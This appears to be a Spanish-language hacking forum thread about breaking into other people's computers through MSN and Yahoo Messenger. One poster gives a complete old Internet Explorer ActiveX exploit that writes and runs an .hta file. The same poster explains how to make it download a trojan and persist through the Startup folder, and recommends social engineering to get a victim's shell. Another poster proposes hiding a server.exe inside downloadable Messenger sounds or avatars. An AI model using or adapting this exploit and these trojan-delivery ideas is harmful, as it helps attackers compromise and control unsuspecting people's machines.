Talvez puedan probar con un exploit muy antiguo que hace ejecutar algo al que abria una pagina web...
este exploit fue muy masivo pero hoy en dia el iexplorer dice si kieres dejar pasar el script y despues si kieres dejar pasar el contenido activo...
si el html proviene desde internet simplemente no te deja ejecutar nda porque sale un mensaje que es altamente dañina la pagina que estas viendo.
taalves esto se omita en el messenger... prueben ustedes porque yo re100 estuve viendo el foro y aún no he hecho ninguna prueva, ademas como no uso el msn no tengo ni idea donde están esas animaciones :p, pero bueno... el exploit dice así:
<html>
<OBJECT id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" width="14" height="14" >
</OBJECT>
<script>
scr.Reset();
scr.Path="C:\\winmem.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>wsh.Run('command /c notepad.exe',false,6)</"+"SCRIPT>";scr.write();
</script>
</body>
</html>
si lo guardas como index.html o htm y lo abres podrás ver que se crea un archivo winmem.hta en c:\ y que se considera ejecutable... al abrirlo se ejecuta el notepad.... yo lo hice de esa forma para dar un ejemplo pero pueden hacer que descargue un server oo algo asi de alguna parte o modificando el winmem.hta puede funcionar como troyano mismo.
pueden dar la direccion de %homepath%\menú inicio\programas\inicio y una segunda url %homepath%\(todo lo demas pero en ingles)
y de esa forma se ejecuta solo cuando buelvan a iniciar secion en la makina.
hay un exploit para yahoo que mandando cierto texto a una persona (script) en el area del mensage podían joderles el mensajero, abrirles url remotamente o incluso hacer que se ejecuten cosas solas... por ejemplo yo escribo a juanito (texto que no me acuerdo :p) y hace que mi server que está en mi escritorio le llegue a juanito y se abra sin que el sepa... talvez con la llegada del live messenger que hace posible la compatibilizacion entre yahoo y hotmail puedan hacer algo para hot asi como para yahoo... o modificar este exploit para que se haga efectivo en hot... la idea es que si se puede pero son pocos los que saben y los que saben no kieren decirlo porque si se hace demasiado publico den por echo que saldrá algun parche.
(el exploit está en la pagina
http://yahoo-sux.com/site/modules/news/)
en que mas podría ayudarles???..mmmmm....
lo de las firmas... de la misma forma que microsoft hace las firmas deve tambien poderse para nosotros no?
todo esto es digital men! digitos solamente con ordenes de ejecución... HAY POR AQUÍ ALGÚN CAPO EN PROGRAMACIÓN O EN EDICIONES HEXAGECIMALES!!!???
Pero bueno.... creo que la ingeniería social es mas facil jijijiji por ejemplo si fuera yo... solo haría que me aceptara algo la otra persona y al ejecutarlo me da su shell y con eso estoy listo
Autor
En línea
una que estoy mirando un poco mas a fondo es la de los sonidos de messenger plus dado que lleva una opción "descargar nuevo sonido" y hay algunos que se nota muchisimo que son subidos por personas particulares lo que no se es como 
sabiendo como subirlo se podría mezclar el server.exe con el sonido aunque eso no tengo certeza de que se pueda 
, y ahora tambien estan empezando a usarse los avatares animados de Mocosoft no permite usar gifs sino que usa archivos con extension .MCO tambien ... todo es plan de buscar...
